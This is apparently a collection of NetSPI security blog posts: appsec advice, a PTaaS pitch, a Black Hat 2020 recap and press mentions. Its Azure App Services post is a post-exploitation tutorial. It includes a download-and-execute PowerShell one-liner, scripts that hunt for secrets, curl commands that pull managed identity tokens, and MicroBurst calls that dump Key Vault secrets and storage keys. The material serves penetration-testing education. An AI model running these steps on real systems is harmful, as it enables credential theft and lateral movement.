
Three Keys to Ensuring Application Security from a 40-Year Information Security Veteran

Managing Security in a Regulated Industry

As is the case with any regulated industry, the insurance industry has long been driven by regulatory pressures that compel it to undertake security activities. Over the past 5-10 years, the level of regulatory pressure has grown dramatically, forcing regulated industries to take proactive action to address risk within their environments. At the same time, customers have become savvier and have raised their expectations of what responsible corporate stewardship looks like relative to security and privacy.

The combination of this increased regulatory pressure and higher customer expectations has finally, and relatively swiftly, generated positive movement to address security and privacy risks. The result is active involvement of executives. This contrasts with the snail-like pace of change in the preceding 50 years, when the insurance industry was slow to adopt and embrace technology – and adoption of appropriate security and privacy controls was slower still!

Most of the regulations are quite explicit about the need to exercise due diligence over your vendors, and that points to another difference in the insurance industry – as in most other regulated industries: if you are not at the very top of the supply chain, you are constantly being audited by your customers, on top of the traditional audits conducted by industry regulators and independent audit firms – and those obligations naturally flow down to the other providers in the supply chain.

Advice for Communicating and Working with Organizational Leadership

It’s important to note that I came up, especially during my time in the military, defense, and aerospace industries, in a profession that attempted to drive security improvements using FUD (fear, uncertainty, and doubt), where you’re essentially scaring people into doing the right thing. I’ve found that rarely works well and is not a sustainable approach.

In my more recent roles in the insurance industry, my team and I function as risk managers, and we really do view one of our primary roles as illuminating risk and communicating it to the appropriate levels of the organization. Most of the companies I've worked at are mid-sized, which makes it easier to implement a senior executive oversight committee or steering committee – and I leverage them a lot, with great success. That approach may not work quite as well at very large companies, but the concept is sound.

By getting this steering committee to agree to certain security- and privacy-related objectives, standards, or metrics that are important to them, you can then use their involvement to help accomplish your goals. It also shifts responsibility for executing those changes down the operational business path rather than attempting to force it because “the security team said we must do it.”

I have also always tended to follow an 80/20 rule for addressing risks. It’s not that I don’t care about the 20 percent, but I’ve seen too many times where my peers have set out to boil the ocean and that just doesn’t work. Worse yet, you can seriously damage your credibility with business executives if they perceive your goals as unrealistic. Much better to incrementally pick off chunks, then use the metrics to show success over time.

Application Security: Three Critical Components to Ensuring Security

1. Treat the Platform as a Key Asset and Report on its Security Posture to Executives

I’ve seen most organizations struggle with the application security side, including such basic activities as regular security testing. I’m having less trouble these days, and one of the reasons is that I get business and IT leaders to identify the key platforms used to run the business, and then I report on their security posture.

If you have not done this before, I would suggest starting with the top 5 or 10 platforms – or whatever the right number is based on organizational appetite (again so you are not trying to boil the ocean).

In my current organization, business and IT leaders selected and designated approximately 30 platforms as “key platforms” for the operation of our business. This is important because we can then start reporting metrics on the posture of each of those platforms. You can report a wide array of relevant metrics, such as: whether the platform has been tested dynamically or statically; whether it has logging capabilities; whether logs are being shipped to the SIEM; the number of medium- or high-severity vulnerabilities; malware protection; DLP; resiliency; or any other security capabilities that are of interest to your organization. While most of us could easily pick 15-20 metrics we think are important, most organizations cannot really process that many metrics in a meaningful way, so I would suggest sticking to the 3-6 most important metrics that support your objectives.

This report can be as simple as a red, yellow, or green, which is typically what I do because I think there’s a danger in trying to be too precise with things. Sometimes we throw figures out that give the illusion of precision where none exists. For most organizations, red, yellow, and green are good enough as long as the criteria for assigning them are clearly defined and well understood. In my experience, when some metric goes from green to yellow or yellow to red, and you’re talking to an EVP, they’re going to want to know why it changed. More importantly, they’re going to want to solve the problem. Even if they decide to accept the risk, the conversation provides important context for them so that they make informed risk decisions. This approach can also help prepare the organization for financial forecasts for the following year. For example, if something is going to be a big lift, we can plan to do it next year. But just maintaining that communication and reporting is important.

Regardless of how you express your metrics, it’s important that the audience you’re communicating this information to has a hand in crafting what those metrics measure. Each executive has their own level of understanding and their own hot-button issues that you should be measuring. For example, about half the things I measure or report on are things the executives explicitly indicated they wanted to see. This generates a lot of buy-in and adds value to what you’re reporting.

2. Perform Rigorous Testing

Over the past 10-15 years, I’ve been advocating the use of both dynamic and static application security testing. Widespread adoption has been slow, but I have seen a marked increase in recent years and that’s beginning to bear fruit. For example, I have an application about to go live that the appdev team knew would go through both static and dynamic testing and the results were some of the best I’ve seen. It was clear that the appdev team really made a conscious effort to minimize any identified flaws and the result was a much more secure, stable platform.

3. Educate Developers About Secure Coding Practices

Another component of appsec is making sure the developers are at least aware of secure coding practices. Certainly, if they’re web developers and they don’t know OWASP, then you need to look for another developer. It’s that simple. However, my team has an important role in identifying appropriate training, and leadership has a role in providing opportunities for developers to participate in that training. Incidentally, metrics around developer training are another useful tool to help drive improvements, and they can generally be correlated with reductions in coding flaws and vulnerabilities that make it into production systems.


Four Ways Pentesting is Shifting to an “Always On” Approach

No industry is safe from a cyberattack, and last year’s long list of breach victims is a testament to that. Within the first six months of 2019, 3,800 breaches were reported, exposing 4.1 billion records. The impact of a breach continues to grow, and the wide-ranging threat landscape continues to shift – thus, our network security testing strategies should evolve in tandem.

Penetration testing has been around for decades and has remained at the foundation of vulnerability testing and management programs. But as the modern enterprise continues to evolve, and attack surfaces become much more complex, pentesting has remained relatively unchanged. Following a pentest, security and IT teams are typically left with an immense amount of vulnerability data that ends up in PDFs with limited context, making it challenging to process and collaborate with development teams for vulnerability remediation. In addition, many organizations struggle with the breadth of their security testing coverage and lack the time or financial resources to adequately pentest all of the applications and systems in their environment – and they can’t remediate all the vulnerabilities from each test. According to Gartner, once a company discloses a vulnerability and releases a patch, it takes 15 days before an exploit appears in the wild.

To ensure critical assets are secure and their entire attack surface has some level of pentesting coverage, today’s modern enterprise requires a more continuous and comprehensive penetration testing process.

Enter Penetration Testing as a Service, or PTaaS: a hybrid approach to security testing that combines manual and automated ethical hacking attempts with 24/7 scanning, consultation and streamlined communication and reporting delivered through a single platform. By delivering pentesting “as a service,” organizations receive a broader, more thorough vulnerability audit year-round instead of relying on point-in-time pentests, which are typically executed just once a year.

Point-in-Time Pentesting Versus PTaaS

While an important starting point, point-in-time penetration testing has its limitations. Once a test has been completed, how can one be sure that no new vulnerabilities arise during the remaining 364 days of the year? To better understand the impact of PTaaS, here are four core differences between point-in-time penetration testing and PTaaS. PTaaS gives organizations:

  1. Visibility and control. Through PTaaS, organizations are put in control of the pentest. Security teams gain the ability to request and scope new engagements, see the progress and status of all open engagements, easily parse the vulnerability trends, and work to understand and verify the effectiveness of remediations, all within a single online platform.
  2. Paths to quicker remediation. The penetration testing reports, often static PDFs, created after a standard pentest leave much to be desired when it comes to vulnerability remediation. On average, it takes 67 days to remediate critical vulnerabilities. PTaaS platforms allow findings to be actionable as they can be sorted, searched, filtered, and audited. As the vulnerability or exploit evolves over time, the data related to it will be updated, not remain unchanged in a document. Additionally, PTaaS provides development teams with the most up-to-date and relevant information for remediation, with assistance and consultation from the team of pentesters who found the vulnerability.
  3. More security testing possibilities. Due to both the cost savings of automation and the efficiency provided for remediating vulnerabilities, companies are able to do more with their budgets and internal resources. The faster vulnerabilities are found and remediated, the quicker the company can move on to protect itself from the next vulnerability.
  4. Prioritized, actionable results. PTaaS platforms, like NetSPI’s Resolve, aggregate and correlate the findings, eliminating manual administrative tasks while providing a result set that drives the right actions in an efficient manner for all organizations. According to Gartner, one of the most common ways to fail at vulnerability management is to send a report with thousands of vulnerabilities for the operations team to fix. Successful vulnerability management programs leverage advanced prioritization techniques and automated workflow tools to streamline the handover to the team responsible for remediation.

What’s fueling the desire for an “as a Service” model for penetration testing?

Businesses, no matter the industry, are constantly changing and are on the lookout for technology that can scale with them. Because businesses remain in constant flux today – whether engaging in a merger or acquisition or integrating a new software program – there is a desire to find the most efficient way to maintain an always-on vulnerability testing strategy, while also ensuring the capacity to remediate. PTaaS is scalable, so organizations of all sizes and maturity levels can use it to maintain a small part of their security testing program – or the entire program.

Further, heavily regulated industries – such as financial services, healthcare, and government – benefit greatly from an “as a Service” model, given the level of sensitive data stored and pressures of maintaining compliance. With PTaaS, organizations can consume their data, on-demand, in many formats for their various regulatory bodies and gain the visibility to know what is happening in their security testing program, and what actions need to be taken.

PTaaS is the new standard for vulnerability testing and remediation as security teams recognize that annual testing does not enable a proactive security strategy. Pentesting engagements are no longer a once-a-year tool for compliance and have evolved into a critical part of day-to-day security efforts.


Lateral Movement in Azure App Services

We test a lot of web applications at NetSPI, and as everyone continues to move their operations into the cloud, we’re running into more instances of applications being run on Azure App Services.


Whenever we run into an App Services application with a serious vulnerability, I’ll frequently get a ping asking about next steps to take in an Azure environment. This blog will hopefully answer some of those questions.

Initial Access

We will be primarily talking about command execution on an App Services host. There are plenty of other vulnerabilities (SQLi, SSRF, etc.) that we could put into the context of Azure App Services, but we’ll save those for another blog.

For our command injection examples, we’ll assume that you’ve used one of the following methods to execute commands on a system:

  • An uploaded web shell
  • Unintended command injection via an application issue
  • Intended command injection through application functionality

Alternatively, keep in mind that Azure Portal access (with an account that has Contributor rights on the app) also allows you to run commands from the App Services Console. This will be important if the app uses a higher-privileged Managed Identity and we want to use it to escalate Azure permissions.


For the sake of simplicity, we’ll also assume that this is a relatively clean command injection (See Web Shell), where you can easily see the results of your commands. If we want to get really complicated, we could talk about using side channels to exfiltrate command results, but that’s also for another blog.

Azure “App Services”

To further complicate matters, Azure App Services encompasses “Function Apps” and “App Service Apps”. There are some key differences between the two, but for the purposes of this blog, we’ll consider them to be the same. Additionally, there are Linux and Windows options for both, so we’ll try to cover options for those as well.

If you want to follow along with your own existing App Services app, you can use the Console (or SSH) section in the Development Tools section of the Azure Portal for your App Services app.


Choose Your Own Adventure

With command execution on the App Services host, there are a couple of paths that you can take:

Looking Locally

First things first, this is an application server, so you might want to look at the application files.

  • The application source code files can (typically) be found at %DEPLOYMENT_SOURCE%
  • The actual working files for the application can (typically) be found at %DEPLOYMENT_TARGET%
  • Or /home/site/wwwroot if you’re working with a Linux system

If you’re operating on a bare bones shell at this point, I would recommend pulling down an appropriate web shell to your %DEPLOYMENT_TARGET% (or /home/site/wwwroot) directory. This will allow you to upgrade your shell and allow you to better explore the host.

Just remember, this app server is likely facing the internet and a web shell without a password easily becomes someone else’s web shell.

Within the source code files, you can also look for common application configuration files (web.config, etc.) that might contain additional secrets that you could use to pivot through to other services (as we’ll see later in the blog).

Looking at the Environment

On an App Services host, most of your configuration variables will be available as environmental variables on the host. These variables will most likely contain keys that we can use to pivot to other Azure services in the subscription.

Since you’re most likely to have a cmd.exe shell, you can just use the “set” command to list out all of the environmental variables. It will look like this (without the redactions):

[Screenshot: Windows environment variable listing]

If you’re using PowerShell for your command execution, you can use “dir env: | ft -Wrap” to do the same. Make sure you pipe to “ft -Wrap”, as that allows the full text values to be returned without being truncated.

Alternatively, if you’re in a Linux shell, you can use the “printenv” command to accomplish the same:

[Screenshot: Linux printenv output]

Now that we (hopefully) have some connection strings for Azure services, we can start getting into other services.

Accessing Storage Accounts

If you’re able to find an Azure Storage Account connection string, you should be able to remotely mount that storage account with the Azure Storage Explorer.

Here are a couple of common Windows environmental variables that hold those connection strings:

  • APPSETTING_AzureWebJobsStorage
  • APPSETTING_WEBSITE_CONTENTAZUREFILECONNECTIONSTRING
  • AzureWebJobsStorage
  • WEBSITE_CONTENTAZUREFILECONNECTIONSTRING

Additionally, you may find these strings in the application configuration files. Keep an eye out for any config files containing “core.windows.net”, storage, blob, or file.
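To speed up that hunt, you can script the search across both the environment and the deployment directory. Below is a minimal Python sketch; the regex, file extensions, and fallback path are illustrative assumptions rather than an exhaustive list:

import os
import re

# Rough indicators of Azure Storage connection strings and other credentials (illustrative, not exhaustive)
SECRET_PATTERN = re.compile(r'AccountKey=|core\.windows\.net|password\s*=', re.I)

# 1. Check the environmental variables
for name, value in os.environ.items():
    if SECRET_PATTERN.search(value):
        print('[env] %s=%s' % (name, value))

# 2. Check common config file types under the deployment directory
root = os.environ.get('DEPLOYMENT_TARGET', '/home/site/wwwroot')
for dirpath, _, filenames in os.walk(root):
    for filename in filenames:
        if filename.lower().endswith(('.config', '.json', '.env')):
            path = os.path.join(dirpath, filename)
            try:
                text = open(path, errors='ignore').read()
            except OSError:
                continue
            if SECRET_PATTERN.search(text):
                print('[file] %s' % path)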

Using the Azure Storage Explorer, copy the Storage Account connection string and use that to add a new Storage Account.


Now that you have access to the Storage Account, you should be able to see any files that the application has rights to.
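If you would rather enumerate the account from a shell instead of Storage Explorer, the same connection string works with the Azure SDK. Here is a minimal sketch, assuming the azure-storage-blob Python package is available and using a placeholder connection string:

# pip install azure-storage-blob
from azure.storage.blob import BlobServiceClient

# Placeholder - substitute the connection string recovered from the host
conn_str = 'DefaultEndpointsProtocol=https;AccountName=ACCOUNT;AccountKey=KEY;EndpointSuffix=core.windows.net'

client = BlobServiceClient.from_connection_string(conn_str)

# Walk every container and blob the connection string grants access to
for container in client.list_containers():
    print(container.name)
    container_client = client.get_container_client(container.name)
    for blob in container_client.list_blobs():
        print('  ' + blob.name)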



Accessing Azure SQL Databases

Similar to the Storage Accounts, you may find connection strings for Azure SQL in the configuration files or environmental variables. Most Azure SQL servers that I encounter have access locked down to specific IP ranges, so you may not be able to remotely access the servers from the internet. Every once in a while, we’ll find a server with 0.0.0.0-255.255.255.255 in its allowed list, but that’s pretty rare.


Since direct SQL access from the internet is unlikely, we will need an alternative that works from within the App Services host.

Azure SQL from Windows:

For Windows, we can plug in the values from our connection string and make use of PowerUpSQL to access Azure SQL databases.

Confirm Access to the “sql-test” Database on the “netspi-test” Azure SQL server:

D:\home\site\wwwroot>powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/NetSPI/PowerUpSQL/master/PowerUpSQL.ps1'); Get-SQLConnectionTest -Instance 'netspi-test.database.windows.net' -Database sql-test -Username MyUser -Password 123Password456 | ft -wrap"


ComputerName                     Instance                         Status    
------------                     --------                         ------    
netspi-test.database.windows.net netspi-test.database.windows.net Accessible

Execute a query on the “sql-test” Database on the “netspi-test” Azure SQL server:

D:\home\site\wwwroot>powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/NetSPI/PowerUpSQL/master/PowerUpSQL.ps1'); Get-SQLQuery -Instance 'netspi-test.database.windows.net' -Database sql-test -Username MyUser -Password 123Password456 -Query 'select @@version' | ft -wrap"


Column1                                                                        
-------                                                                        
Microsoft SQL Azure (RTM) - 12.0.2000.8                                        
    Jul 31 2020 08:26:29                                                          
    Copyright (C) 2019 Microsoft Corporation

From here, you can modify the query to search the database for more information.

For more ideas on pivoting via Azure SQL, check out the PowerUpSQL GitHub repository and Scott Sutherland’s NetSPI blog author page.

Azure SQL from Linux:

For Linux hosts, you will need to check the stack that you’re running (Node, Python, PHP, .NET Core, Ruby, or Java). In your shell, run “printenv | grep -i version” and look for things like RUBY_VERSION or PYTHON_VERSION.

For simplicity, we will assume that we are set up with the Python Stack and pyodbc is already installed as a module. For this, we will use a pretty basic Python script to query the database.

Other stacks will (most likely) require some different scripting or clients that are more compatible with the provided stack, but we’ll save that for another blog.

Execute a query on the “sql-test” Database on the “netspi-test” Azure SQL server:

root@567327e35d3c:/home# cat sqlQuery.py
import pyodbc
server = 'netspi-test.database.windows.net'
database = 'sql-test'
username = 'MyUser'
password = '123Password456'
driver= '{ODBC Driver 17 for SQL Server}'

with pyodbc.connect('DRIVER='+driver+';SERVER='+server+';PORT=1433;DATABASE='+database+';UID='+username+';PWD='+ password) as conn:
        with conn.cursor() as cursor:
                cursor.execute("SELECT @@version")
                row = cursor.fetchone()
                while row:
                        print (str(row[0]))
                        row = cursor.fetchone()

root@567327e35d3c:/home# python sqlQuery.py
Microsoft SQL Azure (RTM) - 12.0.2000.8
        Jul 31 2020 08:26:29
        Copyright (C) 2019 Microsoft Corporation

Your best bet for deploying this script to the host is probably downloading it from a remote source. Trying to manually edit Python from the Azure web-based SSH connection is not going to be a fun time.

More generally, trying to do much of anything in these Linux hosts may be tricky. For this blog, I was working in a sample app that I spun up for myself and immediately ran into multiple issues, so your mileage may vary here.

For more information about using Python with Azure SQL, check out Microsoft’s documentation.

Abusing Managed Identities to Get Tokens

An application/VM/etc. can be configured with a Managed Identity that is given rights to specific resources in the subscription via IAM policies. This is a handy way of granting access to resources, but it can be used for lateral movement and privilege escalation.

We’ve previously covered Managed Identities for VMs on the Azure Privilege Escalation Using Managed Identities blog post. If the application is configured with a Managed Identity, you may be able to use the privileges of that identity to pivot to other resources in the subscription and potentially escalate privileges in the subscription/tenant.

In the next section, we’ll cover getting tokens for a Managed Identity that can be used with the management.azure.com REST APIs to determine the resources that your identity has access to.

Getting Tokens

There are two different ways to get tokens out of your App Services application. Each of these depends on a different version of the REST API, so depending on the environmental variables you have at your disposal, you may need to choose one or the other.

*Note that if you’re following along in the Console, the Windows commands will require writing the token to a file first, as curl doesn’t play nicely with the Console output.

Windows:

  • MSI Secret Option:
curl "%MSI_ENDPOINT%?resource=https://management.azure.com&api-version=2017-09-01" -H secret:%MSI_SECRET% -o token.txt
type token.txt
  • X-IDENTITY-HEADER Option:
curl "%IDENTITY_ENDPOINT%?resource=https://management.azure.com&api-version=2019-08-01" -H X-IDENTITY-HEADER:%IDENTITY_HEADER% -o token.txt
type token.txt

Linux:

  • MSI Secret Option:
curl "$MSI_ENDPOINT?resource=https://management.azure.com&api-version=2017-09-01" -H secret:$MSI_SECRET
  • X-IDENTITY-HEADER Option:
curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com&api-version=2019-08-01" -H X-IDENTITY-HEADER:$IDENTITY_HEADER

For additional reference material on this process, check out the Microsoft documentation.
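If you are working from a host with a Python stack, the same retrieval is easy to script. The sketch below handles both variants using the endpoint/header pairs from the curl examples above; the subscriptions api-version at the end is an assumption that may need updating for your environment:

import json
import os
import urllib.request

def get_managed_identity_token(resource='https://management.azure.com'):
    # Newer hosts expose IDENTITY_ENDPOINT/IDENTITY_HEADER (api-version 2019-08-01);
    # older hosts expose MSI_ENDPOINT/MSI_SECRET (api-version 2017-09-01)
    if os.environ.get('IDENTITY_ENDPOINT'):
        url = '%s?resource=%s&api-version=2019-08-01' % (os.environ['IDENTITY_ENDPOINT'], resource)
        headers = {'X-IDENTITY-HEADER': os.environ['IDENTITY_HEADER']}
    else:
        url = '%s?resource=%s&api-version=2017-09-01' % (os.environ['MSI_ENDPOINT'], resource)
        headers = {'secret': os.environ['MSI_SECRET']}
    request = urllib.request.Request(url, headers=headers)
    with urllib.request.urlopen(request) as response:
        return json.load(response)['access_token']

# Quick sanity check: list the subscriptions visible to this identity
token = get_managed_identity_token()
request = urllib.request.Request(
    'https://management.azure.com/subscriptions?api-version=2020-01-01',
    headers={'Authorization': 'Bearer ' + token})
print(urllib.request.urlopen(request).read().decode())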

These tokens can now be used with the REST APIs to gather more information about the subscription. We could do an entire post covering all of the different ways you can gather data with these tokens, but here are a few key areas to focus on.

Accessing Key Vaults with Tokens

Using a Managed Identity token, you may be able to pivot over to any Key Vaults that the identity has access to. In order to retrieve these Key Vault values, we will need a token that’s scoped to vault.azure.net. To get this vault token, use the previous process, and change the “resource” URL to https://vault.azure.net.
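Reusing the token helper sketched earlier (the function name comes from that hypothetical sketch), that is just a second call with a different resource:

mgmt_token = get_managed_identity_token('https://management.azure.com')
vault_token = get_managed_identity_token('https://vault.azure.net')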

I would recommend setting two tokens as variables in PowerShell on your own system (outside of App Services):

$mgmtToken = "eyJ0eXAiOiJKV1QiLCJhbGciOiJSU…"
$kvToken = "eyJ0eXAiOiJKV1QiLCJhbGciOiJSU…"

And then pass those two variables into the following MicroBurst functions:

Get-AzKeyVaultKeysREST -managementToken $mgmtToken -vaultToken $kvToken -Verbose
Get-AzKeyVaultSecretsREST -managementToken $mgmtToken -vaultToken $kvToken -Verbose

These functions will poll the subscription for any available Key Vaults, and attempt to read keys/secrets out of the vaults. In the example below, our Managed Identity only had access to one vault (netspi-private) and one secret (TestKey) in that vault.

[Screenshot: Key Vault keys and secrets retrieved via MicroBurst]

Accessing Storage Accounts with Tokens

Outside of any existing storage accounts that may be configured in the app (see above), there may be additional storage accounts that the Managed Identity has access to.

Use the Get-AZStorageKeysREST function within MicroBurst to dump out any additional storage keys that the identity may have access to. This was previously covered in the Gathering Bearer Tokens from Azure Services blog, but note that this function requires a token scoped to management.azure.com.

Get-AZStorageKeysREST -token YOUR_TOKEN_HERE

As previously mentioned, we could do a whole series on the different ways that we could use these Managed Identity tokens, so keep an eye out for future posts here.

Conclusion

Got a shell on an Azure App Services host? Don’t assume that the cloud has (yet again) solved all the security problems in the world. There are plenty of options to potentially pivot from the App Services host, and hopefully you can use one of them from here.

From a defender’s perspective, I have a couple of recommendations:

  • Test your web applications regularly
  • Utilize Azure Web Application Firewall (WAF) to help with coverage
  • Configure your Managed Identities with least privilege
    • Consider architecture that allows other identities in the subscription to do the heavy lifting
    • Don’t give subscription-wide permissions to Managed Identities

Prior Work

I’ve been working on putting this together for a while, but during that time David Okeyode put out a recording of a presentation he did for the Virtual Azure Community Day that follows these attack paths pretty closely. Check out David’s video for a great walkthrough of a real-life scenario.

For other interesting work on Azure tokens, tenant enumeration, and Azure AD, check out Dirk-jan Mollema’s work on his blog: https://dirkjanm.io/


TechTarget: What cybersecurity teams can learn from COVID-19

On August 12, NetSPI Managing Director Nabil Hannan was featured in TechTarget:

There’s a reason why a computer virus is called a “virus,” as they have many similarities to medical viruses. Notably, as medical viruses can have a severe impact on your personal health, a computer virus can severely impact the health of your business. In today’s digital world, a computer virus, a “wormable” remote code execution vulnerability designed to persistently replicate and spread to infect programs and files, can begin causing damage in minutes. Sound familiar? According to the CDC, the virus that causes COVID-19 spreads very easily and sustainably, meaning it spreads from person-to-person without stopping.

With COVID-19 top of mind and making headlines across the globe, CISOs should now take the time to make observations about viruses outside of the technology industry and see how they apply to cybersecurity strategies. So, what exactly can security teams learn from studying medical viruses to ensure the health of a business’ systems and applications? Here are three key considerations.

Read the full article here.


Security Boulevard: 12 Hot Takes on How Red Teaming Takes Pen Testing to the Next Level

On August 11, NetSPI Managing Director Nabil Hannan was featured in Security Boulevard:

Offensive security measures like penetration testing can help enterprises discover the common vulnerabilities and exploitable weaknesses that could put them at risk of costly cybersecurity incidents. By pitting white hat hackers against an organization’s deployed infrastructure, organizations can gain a better understanding of the flaws they should fix first – namely, the ones most likely to be targeted by an everyday criminal.

However, over the years penetration testing services have evolved to be extremely automated and limited in scope. Armed with scanning tools and limited rules of engagement, pen testers tend to focus purely on the technical vulnerabilities within a given system, platform, or segment of the network. Pen tests are usually conducted over short durations of time, and their resultant reports offer up recommendations on fixes that architects or developers can make to code and configuration.

Read the full article here.


Black Hat 2020: Highlights from the Virtual Conference; Calls to Action for the Industry

Black Hat looked different this year as the security community gathered on the virtual stage, due to COVID-19 concerns. “Different” doesn’t necessarily carry a negative connotation: the shift not only addressed public safety concerns, but also enabled the security community to critically think about the way we do work in our digital-centric world, particularly at a time where we are increasingly reliant on technology to stay connected.

When scrolling through the countless briefings available, it was clear that politics and COVID-19 remain top-of-mind. So, let’s start with the biggest topic of the week: election security.

Takeaway #1: Securing the Vote Relies on Collaboration… and Testing

Matt Blaze, a Georgetown University security researcher, kicked off the conference with a keynote titled, Stress-Testing Democracy: Election Integrity During a Global Pandemic. In the past, the industry has had conversations about securing voting machines themselves, but this year, the discussions were centered on online and mail-in voting mechanisms and the hacking of the process. Matt shared, “our confidence in the [election] outcome increasingly depends on the mechanisms that we use to vote.” And this year, we are tasked with scaling up mail-in voting mechanisms.

Blaze looked at software as the core of the election security framework, noting that “software is generally hard to secure, even under the best circumstances.” Though we expect a majority of votes to be made via paper ballot, software will still be used in every facet of the election system, from pre-election (ballot definition, machine provisioning) to post-election (tallying results, reporting, audits, and recounts). So, what is the industry to do?

He suggested that election committees prepare for a wide range of scenarios and threats and work towards software independence, though most don’t have the appropriate budgets to do so – a problem all too familiar to the security industry. Because of this, he encouraged the IT community to volunteer their time and become more involved with local election efforts, specifically by testing the software and machines for vulnerabilities. In a way, he opened the door for ethical hackers, like our team at NetSPI, to get involved. That call to action proved realistic during Black Hat, when voting machine maker ES&S and cybersecurity firm Synack announced a program to vet ES&S’ electronic poll book and new technologies – a call for “election technology vendors to work with researchers in a more open fashion and recognize that security researchers at large can add a lot of value to the process of finding vulnerabilities that could be exploited by our adversaries,” according to WIRED.

Continuing the narrative of election security, the day-two keynote from Renee DiResta, research manager at the Stanford Internet Observatory, informed Black Hat attendees of how to use information security practices to prevent disinformation in mass media (social media, broadcast, online publications). She explained how influence campaigns can skew not only voting results, but also perceptions of companies and, at a larger scale, entire countries and governments. She reiterated that disinformation is indeed a cybersecurity problem that CISOs can’t ignore. In another humbling call to action for the security testing community, DiResta suggested, “we need to do more red teaming around social [media] and think of it as a system and [understand] how attacks can impact operations.” Read more about the keynote on ThreatPost.

Takeaway #2: The Importance of Application Security Has Heightened in 2020

Let’s start with healthcare. Amid the current public health pandemic, healthcare systems continue to be a top target for adversaries due to the sensitive and confidential patient records they hold. During Black Hat, the security industry shined a light on some of the various areas of weakness that can be exploited by an attacker. A big one? Healthcare application security.

One conversation that stuck out to me was from the Dark Reading news desk: HealthScare: Prioritizing Medical AppSec Research. In the interview, Seth Fogie, information security director at Penn Medicine, explains why healthcare application vulnerabilities matter in the day-to-day business of providing patient care. He recommends that the security and healthcare communities open a better line of communication around AppSec research and testing efforts. He would like to see more security professionals asking healthcare administrators which other applications, including those from third-party vendors, they can assess for vulnerabilities. I agree with his recommendation to raise awareness for application testing in healthcare security, as it would add value to the assessments already in effect and ultimately to the organization’s overall security posture.

Then, there are web applications, such as virtual meeting and event platforms, that have seen a surge in popularity. Research released at Black Hat found critical flaws in Meetup.com that showcased common gaps in AppSec. Researchers explained how common AppSec flaws – cross-site scripting and request forgery (both tied to the platform’s API) – could have allowed threat actors to redirect payments and take other malicious actions. This is just one example showcased at Black Hat of the heightened AppSec risks amid COVID-19, as we continue to shift in-person activities to online platforms.

With NetSPI a Black Hat sponsor, my colleague Jake Reynolds and I hosted a 20-minute session on revamping application security (AppSec) programs: Extreme Makeover: AppSec Edition. During the session, we explored the various options for testing [SAST, IAST, SCA, manual], the challenges that exist in current AppSec testing programs, and how to “renovate” an AppSec program to ultimately speed up remediation. Watch the session to learn, through one centralized platform, how to remodel your AppSec program to achieve faster remediation, add context to each vulnerability, enable trend data and reporting functions to track and predict vulnerabilities over time, and reduce false positives.

Takeaway #3: Our Connected Infrastructure Is Vulnerable

As in years past, the Internet of Things (IoT) again took over Black Hat conversations. This year, the research around IoT vulnerabilities proved fascinating. Showcasing the potential impact of IoT infiltration was at the core of the research. Here are some examples:

  • Security researchers at the Sky-Go Team found more than a dozen vulnerabilities in a Mercedes-Benz E-Class car that allowed them to remotely open its doors and start the engine.
  • Researchers with the Georgia Institute of Technology described how certain high-wattage Internet-connected devices such as smart air-conditioners and electric-vehicle (EV) chargers could be used to manipulate energy markets.
  • And perhaps the most interesting, and alarming: James Pavur, an academic researcher and doctoral candidate at Oxford University, used $300 worth of off-the-shelf equipment to hack satellite internet communications to eavesdrop and intercept signals across the globe.

All these examples highlight how much complexity goes into building systems today. As we continue to increase complexity and inter-connectivity, it becomes more challenging to properly protect these systems from being compromised. At NetSPI, we are constantly working with our clients to help them build well-rounded cyber security initiatives. It’s well understood today that just performing penetration testing near the end of a product’s lifecycle, right before going to production, isn’t adequate from a security perspective. It’s important to understand various business objectives and implement proper security touchpoints throughout a product’s lifecycle. Vulnerability detection tools have come a long way in the past decade or so. With significant advances in products like SAST, DAST, RASP, IAST, and SCA, integrating these tools into earlier phases of the SDLC has become a common approach for many organizations. The true challenge, however, is determining how to make security as frictionless as possible within the overall product development lifecycle. NetSPI works continually with clients to help them build and implement strategy around their security programs based on their business objectives and risk thresholds.

Takeaway #4: We’re Learning More About Securing the Remote Workforce

Lastly, many cloud, container, and remote connection-related sessions were held during the conference. Many of them highlighted the need to reinforce security practices pertaining to remote work, or telecommuting – not surprising, given the state of today’s workforce amid the pandemic.

Black Hat research from Orange Cyber Defense demonstrated that VPN technologies ordinarily used by businesses to facilitate remote access to their networks are “poorly understood, improperly configured and don’t provide the full level of protection typically expected of them.” The researchers attribute the vulnerabilities to a common scenario where the remote worker is connected to Wi-Fi that is untrusted, insecure or compromised. Watch this video interview with the researchers via Security Weekly.

It’s an ever-evolving issue that has warranted additional focus this year and the industry is continuing to learn best practices to achieve a secure remote connection. I would consider this topic a silver lining to the pandemic. It has forced the security industry to learn, better understand, and serve as counsel to organizational leaders on the security considerations that come with scaling up remote workers. A great starting place for remote connection security? Read my recent blog post: Keeping Your Organization Secure While Sending Your Employees to Work from Home.

While we certainly missed the face-to-face connections and networking opportunities, the virtual conference was an invaluable opportunity to hold urgent security conversations around election mechanisms, healthcare systems during the pandemic, application security, the growing remote workforce, and connected devices and infrastructures.

While these were my key takeaways, there were many more discussions that took place – and DefCon continues today with prerecorded presentations and live streamed Q&As and panels on Twitch. Want to explore more Black Hat 2020 news? Check out this Black Hat webpage. We hope to see you next year, hopefully in-person!


CIO.com: 4 hot project management trends — and 4 going cold

On August 4, NetSPI Vice President of Services Operations Nancy Bechthold was featured in CIO.com:

Project management is a slippery target. Once the realm of project managers (PMs) armed with a tracking tool like Microsoft Project, an office, a travel budget, and the 411 on excellent meeting space all over the globe, it has become a role — a mindset even — that’s better served by deep knowledge, leadership skills, negotiation tactics, and an empowered (and now probably remote) team.

Even before the pandemic hit, project management was going through a sea change. But the remote nature of our new normal has accelerated and morphed that change so rapidly that trends are going hot and cold before our eyes.

Read the full article here.


The Rise of DDoS Attacks and How to Stop Them

Distributed Denial of Service (DDoS) attacks have gained celebrity status during COVID-19. In the first quarter of 2020, DDoS attacks in the U.S. rose more than 278% compared to Q1 2019 and more than 542% compared to Q4 2019, according to Nexusguard’s 2020 Threat Report. This increase in attacks is correlated with the increased dependency on remote internet access and online services as many organizations’ workforces continue to work from home amid COVID-19 concerns. With the dependency on remote internet access comes an increased need for Internet Service Providers (ISPs) to monitor and mitigate irregular activity on their networks before it results in server outages or loss of critical resources, data, or money. But ISPs aren’t the only ones that need to be proactive as DDoS attacks continue to rise – their customers will face the same problems if proactive security measures are not in place.

